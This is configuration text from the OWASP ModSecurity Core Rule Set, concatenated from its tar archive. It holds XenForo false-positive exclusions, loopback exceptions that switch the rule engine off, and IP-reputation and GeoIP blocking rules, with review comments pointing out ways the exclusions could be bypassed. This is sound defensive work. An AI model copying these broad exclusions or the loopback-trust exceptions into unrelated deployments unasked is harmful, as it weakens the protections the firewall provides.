# # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # These exclusions remedy false positives in a default XenForo install. # The exclusions are only active if crs_exclusions_xenforo=1 is set. # See rule 900130 in crs-setup.conf.example for instructions. SecRule &TX:crs_exclusions_xenforo|TX:crs_exclusions_xenforo "@eq 0" \ "id:9006000,\ phase:1,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-XENFORO" SecRule &TX:crs_exclusions_xenforo|TX:crs_exclusions_xenforo "@eq 0" \ "id:9006001,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-XENFORO" # # -=[ XenForo Front-End ]=- # # Proxy for images and remote content embedded in forum posts # GET /xf/proxy.php?image=https://example.com/some.jpg&hash=foo # GET /xf/proxy.php?link=https://example.com&hash=foo # POST /xf/proxy.php, body: referrer=... 
SecRule REQUEST_FILENAME "@endsWith /proxy.php" \ "id:9006100,\ phase:1,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:image,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:link,\ ctl:ruleRemoveTargetById=931130;ARGS:referrer,\ ctl:ruleRemoveTargetById=942230;ARGS:referrer,\ ver:'OWASP_CRS/3.3.5'" # Store drafts for private message, forum post, thread reply # POST /xf/conversations/draft # POST /xf/conversations/convo-title.12345/draft # POST /xf/forums/forum-title.12345/draft # POST /xf/threads/thread-title-%E2%98%85.12345/draft # # attachment_hash_combined example: # {"type":"post","context":{"post_id":12345},"hash":"0123456789abcdef..."} SecRule REQUEST_FILENAME "@rx /(?:conversations|(?:conversations|forums|threads)/.*)/draft$" \ "id:9006110,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetById=931130;ARGS:href,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:title,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message_html,\ ctl:ruleRemoveTargetById=942200;ARGS:attachment_hash_combined,\ ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\ ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\ ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\ ver:'OWASP_CRS/3.3.5'" # Send PM, edit post, create thread, reply to thread # POST /xf/conversations/add # POST /xf/conversations/add-preview # POST /xf/conversations/messages/1463947/edit # POST /xf/posts/12345/edit # POST /xf/posts/12345/preview # POST /xf/conversations/convo-title.12345/add-reply # POST /xf/threads/thread-title.12345/add-reply # POST /xf/threads/thread-title.12345/reply-preview # POST /xf/forums/forum-title.12345/post-thread # POST /xf/forums/blogs/post-thread # POST /xf/forums/forum-title.12345/thread-preview SecRule REQUEST_FILENAME "@rx 
/(?:conversations/add(?:-preview)?|conversations/messages/\d+/edit|posts/\d+/(?:edit|preview)|(?:conversations|threads)/.*\.\d+/(?:add-reply|reply-preview)|forums/.*/(?:post-thread|thread-preview))$" \ "id:9006120,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:title,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message_html,\ ctl:ruleRemoveTargetById=942200;ARGS:attachment_hash_combined,\ ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\ ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\ ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\ ver:'OWASP_CRS/3.3.5'" # Quote # POST /xf/posts/12345/quote SecRule REQUEST_FILENAME "@rx /posts/\d+/quote$" \ "id:9006130,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:quoteHtml,\ ver:'OWASP_CRS/3.3.5'" # Multi quote # POST /xf/conversations/convo-title.12345/multi-quote # POST /xf/threads/thread-title.12345/multi-quote # quotes={"12345":["quote-html"]} SecRule REQUEST_FILENAME "@rx /(?:conversations|threads)/.*\.\d+/multi-quote$" \ "id:9006140,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:quotes,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[0][value],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[1][value],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[2][value],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[3][value],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[4][value],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[5][value],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[6][value],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[7][value],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[8][value],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[9][value],\ ver:'OWASP_CRS/3.3.5'" # Delete thread # POST /xf/threads/thread-title.12345/delete SecRule REQUEST_FILENAME "@rx /threads/.*\.\d+/delete$" \ "id:9006150,\ phase:2,\ 
pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetById=942130;ARGS:starter_alert_reason,\ ver:'OWASP_CRS/3.3.5'" # Feature thread # POST /xf/threads/thread-title.12345/feature-edit SecRule REQUEST_FILENAME "@rx /threads/.*\.\d+/feature-edit$" \ "id:9006155,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:feature[feature_excerpt]" # Inline moderate thread # POST /xf/inline-mod/ SecRule REQUEST_FILENAME "@endsWith /inline-mod/" \ "id:9006160,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:author_alert_reason,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ ver:'OWASP_CRS/3.3.5'" # Warn member # POST /xf/members/name.12345/warn # POST /xf/posts/12345/warn SecRule REQUEST_FILENAME "@rx /(?:members/.*\.\d+|posts/\d+)/warn$" \ "id:9006170,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:conversation_message,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:notes,\ ver:'OWASP_CRS/3.3.5'" # Editor SecRule REQUEST_URI "@endsWith /index.php?editor/to-html" \ "id:9006200,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:bb_code,\ ctl:ruleRemoveTargetById=942200;ARGS:attachment_hash_combined,\ ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\ ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\ ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\ ver:'OWASP_CRS/3.3.5'" # Editor SecRule REQUEST_URI "@endsWith /index.php?editor/to-bb-code" \ "id:9006210,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:html,\ ver:'OWASP_CRS/3.3.5'" # Post attachment # POST /xf/account/avatar # POST /xf/attachments/upload?type=post&context[thread_id]=12345&hash=foo SecRule REQUEST_FILENAME "@rx /(?:account/avatar|attachments/upload)$" \ "id:9006220,\ phase:1,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveById=200003,\ ctl:ruleRemoveTargetById=942220;ARGS:flowChunkSize,\ ctl:ruleRemoveTargetById=942440;ARGS:flowIdentifier,\ 
ctl:ruleRemoveTargetById=942440;ARGS:flowFilename,\ ctl:ruleRemoveTargetById=942440;ARGS:flowRelativePath,\ ver:'OWASP_CRS/3.3.5'" # Media # POST /xf/index.php?editor/media SecRule REQUEST_URI "@endsWith /index.php?editor/media" \ "id:9006230,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetById=931130;ARGS:url,\ ctl:ruleRemoveTargetById=942130;ARGS:url,\ ver:'OWASP_CRS/3.3.5'" # Emoji # GET /xf/index.php?misc/find-emoji&q=(%0A%0A SecRule REQUEST_URI "@rx /index\.php\?misc/find-emoji&q=" \ "id:9006240,\ phase:1,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetById=921151;ARGS:q,\ ver:'OWASP_CRS/3.3.5'" # Login # POST /xf/login/login SecRule REQUEST_FILENAME "@endsWith /login/login" \ "id:9006300,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\ ver:'OWASP_CRS/3.3.5'" # Register account # POST /xf/register/register # The password is passed in a variable-name form parameter. We don't # want to exclude all parameters completely as this would cause an # unacceptable bypass. So, we exclude only commonly hit rules. 
# Rule 942130 is detached from every argument of the request (the target is
# bare ARGS), and ARGS:reg_key is exempted from all rules tagged OWASP_CRS.
# All other rules keep inspecting the remaining registration fields.
SecRule REQUEST_FILENAME "@endsWith /register/register" \
    "id:9006310,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ctl:ruleRemoveTargetById=942130;ARGS,\
    ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:reg_key,\
    ver:'OWASP_CRS/3.3.5'"

# Confirm account
# GET /xf/account-confirmation/name.12345/email?c=foo
# This rule carries no ver: action, unlike its neighbours.
SecRule REQUEST_FILENAME "@rx /account-confirmation/.*\.\d+/email$" \
    "id:9006315,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:c"

# Edit account
# POST /xf/account/account-details
# ARGS:about_html is exempted from all CRS rules; the picture field only
# from rule 931130.
SecRule REQUEST_FILENAME "@endsWith /account/account-details" \
    "id:9006320,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ctl:ruleRemoveTargetById=931130;ARGS:custom_fields[picture],\
    ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:about_html,\
    ver:'OWASP_CRS/3.3.5'"

# Lost password
# POST /xf/lost-password/user-name.12345/confirm?c=foo
SecRule REQUEST_FILENAME "@rx /lost-password/.*\.\d+/confirm$" \
    "id:9006330,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:c,\
    ver:'OWASP_CRS/3.3.5'"

# Set forum signature
# POST /xf/account/signature
SecRule REQUEST_FILENAME "@endsWith /account/signature" \
    "id:9006340,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:signature_html,\
    ver:'OWASP_CRS/3.3.5'"

# Search
# POST /xf/search/search
# ARGS:keywords is exempted from all CRS rules; ARGS:constraints only from
# the four listed 942xxx rules.
SecRule REQUEST_FILENAME "@endsWith /search/search" \
    "id:9006400,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:keywords,\
    ctl:ruleRemoveTargetById=942200;ARGS:constraints,\
    ctl:ruleRemoveTargetById=942260;ARGS:constraints,\
    ctl:ruleRemoveTargetById=942340;ARGS:constraints,\
    ctl:ruleRemoveTargetById=942370;ARGS:constraints,\
    ver:'OWASP_CRS/3.3.5'"

# Search within thread
# GET /xf/threads/foo.12345/page12?highlight=foo
SecRule REQUEST_FILENAME "@rx /threads/.*\.\d+/(?:page\d+)?$" \
    "id:9006410,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:highlight,\
    ver:'OWASP_CRS/3.3.5'"

# Search within search result
# GET /xf/search/12345/?q=foo
SecRule REQUEST_FILENAME "@rx /search/\d+/$" \
    "id:9006420,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:q,\
    ver:'OWASP_CRS/3.3.5'"

# Contact form
# POST /xf/misc/contact
SecRule REQUEST_FILENAME "@endsWith /misc/contact" \
    "id:9006500,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\
    ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:subject,\
    ver:'OWASP_CRS/3.3.5'"

# Report post
# POST /xf/posts/12345/report
SecRule REQUEST_FILENAME "@rx /posts/\d+/report$" \
    "id:9006510,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\
    ver:'OWASP_CRS/3.3.5'"

# Alternate thread view route
# /xf/index.php?threads/title-having-some-sql.12345/
#
# Especially threads with the HAVING sql keyword are FP prone.
# This rule has some chains to narrow down the exclusion,
# making it harder for an attacker to abuse the ARGS_NAMES
# exclusion on other endpoints.
#
# All four links must match: path ends in /index.php, method is GET,
# exactly one argument is present, and the URI ends in the
# threads/<title>.<digits>/ form. Only then are 942100 and 942230 detached
# from ARGS_NAMES; argument values stay inspected.
SecRule REQUEST_FILENAME "@endsWith /index.php" \
    "id:9006600,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    chain"
    SecRule REQUEST_METHOD "@streq GET" \
        "t:none,\
        chain"
        SecRule &ARGS "@eq 1" \
            "t:none,\
            chain"
            SecRule REQUEST_URI "@rx /index\.php\?threads/.*\.\d+/$" \
                "t:none,\
                ctl:ruleRemoveTargetById=942100;ARGS_NAMES,\
                ctl:ruleRemoveTargetById=942230;ARGS_NAMES"

# Browser fingerprint (DBTech security extension)
# May Contain various javascript/XSS false positives
# The exemption is tied to three fixed positions in the components array
# (indexes 14, 15 and 16).
SecRule REQUEST_URI "@endsWith /index.php?dbtech-security/fingerprint" \
    "id:9006700,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[14][value],\
    ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[15][value],\
    ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[16][value],\
    ver:'OWASP_CRS/3.3.5'"

# Get location info
SecRule REQUEST_FILENAME "@endsWith /misc/location-info" \
    "id:9006710,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:location,\
    ver:'OWASP_CRS/3.3.5'"

#
# -=[ XenForo Global Exclusions ]=-
#
# _xfRedirect, _xfRequestUri can appear on various endpoints.
# Cookies can appear on all endpoints.
#
# SecAction has no condition: once the XenForo exclusions are enabled,
# these target removals apply to every request this rule set sees, whatever
# the path. Most entries detach single rules from one argument or cookie;
# the xf_ls cookie is exempted from every rule tagged OWASP_CRS.
# NOTE(review): if other applications share the same virtual host, they
# inherit these exemptions for parameters and cookies with the same names;
# scoping the rule set to the forum's location avoids that.
SecAction \
    "id:9006800,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    ctl:ruleRemoveTargetById=931120;ARGS:_xfRedirect,\
    ctl:ruleRemoveTargetById=941150;ARGS:_xfRedirect,\
    ctl:ruleRemoveTargetById=942230;ARGS:_xfRedirect,\
    ctl:ruleRemoveTargetById=942260;ARGS:_xfRedirect,\
    ctl:ruleRemoveTargetById=931120;ARGS:_xfRequestUri,\
    ctl:ruleRemoveTargetById=941150;ARGS:_xfRequestUri,\
    ctl:ruleRemoveTargetById=942130;ARGS:_xfRequestUri,\
    ctl:ruleRemoveTargetById=942230;ARGS:_xfRequestUri,\
    ctl:ruleRemoveTargetById=942260;ARGS:_xfRequestUri,\
    ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_csrf,\
    ctl:ruleRemoveTargetById=942210;REQUEST_COOKIES:xf_csrf,\
    ctl:ruleRemoveTargetById=942440;REQUEST_COOKIES:xf_csrf,\
    ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_emoji_usage,\
    ctl:ruleRemoveTargetById=942150;REQUEST_COOKIES:xf_emoji_usage,\
    ctl:ruleRemoveTargetById=942410;REQUEST_COOKIES:xf_emoji_usage,\
    ctl:ruleRemoveTargetByTag=OWASP_CRS;REQUEST_COOKIES:xf_ls,\
    ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_session,\
    ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_user,\
    ver:'OWASP_CRS/3.3.5'"

#
# -=[ XenForo Administration Back-End ]=-
#
# Skip this section for performance unless requested file is admin.php
# One copy per phase. The admin exclusions that follow are selected by the
# requested path alone; the rule set has no view of whether the requester
# holds an admin session.
SecRule REQUEST_FILENAME "!@endsWith /admin.php" \
    "id:9006900,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    skipAfter:END-XENFORO-ADMIN"

SecRule REQUEST_FILENAME "!@endsWith /admin.php" \
    "id:9006901,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    skipAfter:END-XENFORO-ADMIN"

# Admin edit user
# POST /xf/admin.php?users/the-user-name.12345/edit
# ARGS:profile[about] is exempted from all CRS rules; profile[website] only
# from rule 931130.
SecRule REQUEST_URI "@rx /admin\.php\?users/.*\.\d+/edit$" \
    "id:9006910,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:profile[about],\
    ctl:ruleRemoveTargetById=931130;ARGS:profile[website],\
    ver:'OWASP_CRS/3.3.5'"

# Admin save user
# POST
/xf/admin.php?users/the-user-name.12345/save # Runs in phase 1 to be able to remove rule 200003. SecRule REQUEST_URI "@rx /admin\.php\?users/.*\.\d+/save$" \ "id:9006920,\ phase:1,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveById=200003,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:custom_fields[occupation],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:custom_fields[personal_quote],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:profile[about],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:profile[signature],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:custom_fields[sexuality],\ ctl:ruleRemoveTargetById=931130;ARGS:custom_fields[picture],\ ctl:ruleRemoveTargetById=931130;ARGS:profile[website],\ ver:'OWASP_CRS/3.3.5'" # Admin edit forum notice # POST /xf/admin.php?notices/0/save # POST /xf/admin.php?notices/forum-name.12345/save SecRule REQUEST_URI "@rx /admin\.php\?notices/(?:.*\.)?\d+/save$" \ "id:9006930,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:title,\ ver:'OWASP_CRS/3.3.5'" # Admin batch thread update # POST /xf/admin.php?threads/batch-update/action SecRule REQUEST_URI "@rx /admin\.php\?(?:threads|users)/batch-update/action$" \ "id:9006940,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetById=942200;ARGS:criteria,\ ctl:ruleRemoveTargetById=942260;ARGS:criteria,\ ctl:ruleRemoveTargetById=942330;ARGS:criteria,\ ctl:ruleRemoveTargetById=942340;ARGS:criteria,\ ctl:ruleRemoveTargetById=942370;ARGS:criteria,\ ver:'OWASP_CRS/3.3.5'" # Edit forum theme # POST /xf/admin.php?styles/title.1234/style-properties/group&group=basic SecRule REQUEST_URI "@rx /admin\.php\?styles/" \ "id:9006950,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetById=942200;ARGS:json,\ ctl:ruleRemoveTargetById=942260;ARGS:json,\ ctl:ruleRemoveTargetById=942300;ARGS:json,\ ctl:ruleRemoveTargetById=942330;ARGS:json,\ ctl:ruleRemoveTargetById=942340;ARGS:json,\ ctl:ruleRemoveTargetById=942370;ARGS:json,\ 
ctl:ruleRemoveTargetById=942440;ARGS:json,\ ver:'OWASP_CRS/3.3.5'" # Set forum options # POST /xf/admin.php?options/update SecRule REQUEST_URI "@rx /admin\.php\?options/update" \ "id:9006960,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:options[boardInactiveMessage],\ ver:'OWASP_CRS/3.3.5'" # Edit pages/templates # POST /xf/admin.php?pages/0/save # POST /xf/admin.php?pages/foo.12345/save # POST /xf/admin.php?templates/foo.1234/save SecRule REQUEST_URI "@rx /admin\.php\?(?:pages|templates)/.*/save" \ "id:9006970,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:template,\ ver:'OWASP_CRS/3.3.5'" SecMarker "END-XENFORO-ADMIN" SecMarker "END-XENFORO" modsecurity-crs-3.3.5/rules/REQUEST-905-COMMON-EXCEPTIONS.conf000066400000000000000000000031311446122515100227660ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # This file is used as an exception mechanism to remove common false positives # that may be encountered. 
#
# Exception for Apache SSL pinger
#
# Chained rule: it matches only when the request line is exactly "GET /"
# (no HTTP version token) AND REMOTE_ADDR is a loopback address. On a match
# the rule engine and the audit engine are both switched off for the
# transaction, so no later rule inspects it and no audit record is written.
#
# NOTE(review): this exception trusts REMOTE_ADDR. If a reverse proxy, TLS
# terminator or load balancer on the same host forwards client traffic over
# loopback, every request would satisfy the address condition and only the
# request line would remain as a gate - confirm that REMOTE_ADDR reflects the
# real client in such deployments, or disable this exception there.
#
SecRule REQUEST_LINE "@streq GET /" \
    "id:905100,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-apache',\
    tag:'attack-generic',\
    ver:'OWASP_CRS/3.3.5',\
    chain"
    SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \
        "t:none,\
        ctl:ruleEngine=Off,\
        ctl:auditEngine=Off"

#
# Exception for Apache internal dummy connection
#
# Three chained conditions, all of which must hold:
#   1. REMOTE_ADDR is a loopback address,
#   2. the User-Agent header ends with "(internal dummy connection)",
#   3. the request line is "GET /" or "OPTIONS *" followed by an HTTP/1.x or
#      HTTP/2.x version token.
# On a match the rule engine and the audit engine are switched off for the
# transaction.
#
# NOTE(review): conditions 2 and 3 are values taken from the request itself;
# the loopback address is the only condition a remote client should not be
# able to satisfy. The same-host proxy caveat therefore applies here as well:
# verify that forwarded client traffic never reaches this rule with a
# loopback REMOTE_ADDR.
#
SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \
    "id:905110,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-apache',\
    tag:'attack-generic',\
    ver:'OWASP_CRS/3.3.5',\
    chain"
    SecRule REQUEST_HEADERS:User-Agent "@endsWith (internal dummy connection)" \
        "t:none,\
        chain"
        SecRule REQUEST_LINE "@rx ^(?:GET /|OPTIONS \*) HTTP/[12]\.[01]$" \
            "t:none,\
            ctl:ruleEngine=Off,\
            ctl:auditEngine=Off"
modsecurity-crs-3.3.5/rules/REQUEST-910-IP-REPUTATION.conf000066400000000000000000000242421446122515100223210ustar00rootroot00000000000000# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.5
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------

#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#

# Paranoia-level gate, one rule per phase: when tx.executing_paranoia_level is
# below 1, jump to the END-REQUEST-910-IP-REPUTATION marker so that none of
# the rules in this file run in that phase.
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:910011,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:910012,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#

#
# -=[ IP Reputation Block Flag Check ]=-
#
# The first check we do is to see if the client IP address has already
# been blacklisted by rules from previous requests.
#
# If the rule matches, it will do a skipAfter and pick up processing
# at the end of the request phase for actual blocking.
#
# Both chained conditions must hold:
#   - TX:DO_REPUT_BLOCK is 1 (the opt-in switch; it is set outside this file,
#     presumably in crs-setup.conf - confirm), and
#   - IP:REPUT_BLOCK_FLAG is 1 (set by other reputation rules in this rule
#     set, e.g. 910100, with an expiry of tx.reput_block_duration).
# On a match the critical anomaly score is added to tx.anomaly_score_pl1, the
# stored ip.reput_block_reason is written to the log data, and evaluation
# jumps to BEGIN-REQUEST-BLOCKING-EVAL, skipping the remaining request rules.
#
# NOTE(review): the flag lives in the persistent IP collection, so this check
# only works if that collection is initialised before this rule runs, and it
# applies to every client that shares the collection key - verify how the
# collection is keyed in the initialisation rules.
#
SecRule TX:DO_REPUT_BLOCK "@eq 1" \
    "id:910000,\
    phase:2,\
    block,\
    t:none,\
    msg:'Request from Known Malicious Client (Based on previous traffic violations)',\
    logdata:'Previous Block Reason: %{ip.reput_block_reason}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-reputation-ip',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    chain,\
    skipAfter:BEGIN-REQUEST-BLOCKING-EVAL"
    SecRule IP:REPUT_BLOCK_FLAG "@eq 1" \
        "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

#
# -=[ GeoIP Checks ]=-
#
# This rule requires activating the SecGeoLookupDB directive
# in the crs-setup.conf file and specifying
# the list of blocked countries (tx.high_risk_country_codes).
#
# This rule does a GeoIP resolution on the client IP address.
#
# Chain of three conditions:
#   1. tx.high_risk_country_codes is not the empty string (the feature is
#      configured),
#   2. the @geoLookup on TX:REAL_IP succeeds,
#   3. the resulting GEO:COUNTRY_CODE is found within the configured list.
# On a match the critical anomaly score is added to tx.anomaly_score_pl1 and
# the per-IP reputation flag is set; the flag expires after
# tx.reput_block_duration seconds. ip.reput_block_reason gets no expiry in
# this rule, so the stored reason can outlive the flag.
#
# NOTE(review): the lookup runs on TX:REAL_IP, which is populated outside this
# file. If that value can be derived from a client-supplied header, the GeoIP
# verdict follows that header - confirm how tx.real_ip is set. Because the
# flag is stored per IP, later requests from the same address are affected
# until the flag expires.
#
SecRule TX:HIGH_RISK_COUNTRY_CODES "!@rx ^$" \
    "id:910100,\
    phase:2,\
    block,\
    t:none,\
    msg:'Client IP is from a HIGH Risk Country Location',\
    logdata:'%{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-reputation-ip',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    chain"
    SecRule TX:REAL_IP "@geoLookup" \
        "chain"
        SecRule GEO:COUNTRY_CODE "@within %{tx.high_risk_country_codes}" \
            "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
            setvar:'ip.reput_block_flag=1',\
            setvar:'ip.reput_block_reason=%{rule.msg}',\
            expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'"

#
# -=[ IP Reputation Checks ]=-
#
# ModSecurity Rules from Trustwave SpiderLabs: IP Blacklist Alert
# Ref: http://www.modsecurity.org/projects/commercial/rules/
#
# This rule checks the client IP address against a list of recent IPs captured
# from the SpiderLabs web honeypot systems (last 48 hours).
#
# The rule below is shipped disabled (every line is commented out). If it is
# re-enabled, note that unlike its neighbours it carries neither
# tag:'OWASP_CRS' nor a ver action, so tag-based exclusions would not cover it.
#
#SecRule TX:REAL_IP "@ipMatchFromFile ip_blacklist.data" \
#    "id:910110,\
#    phase:2,\
#    block,\
#    t:none,\
#    msg:'Client IP in Trustwave SpiderLabs IP Reputation Blacklist',\
#    tag:'application-multi',\
#    tag:'language-multi',\
#    tag:'platform-multi',\
#    tag:'attack-reputation-ip',\
#    tag:'paranoia-level/1',\
#    severity:'CRITICAL',\
#    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
#    setvar:'ip.reput_block_flag=1',\
#    setvar:'ip.reput_block_reason=%{rule.msg}',\
#    expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'"

#
# First check if we have already run an @rbl check for this IP by checking in IP collection.
# If we have, then skip doing another check.
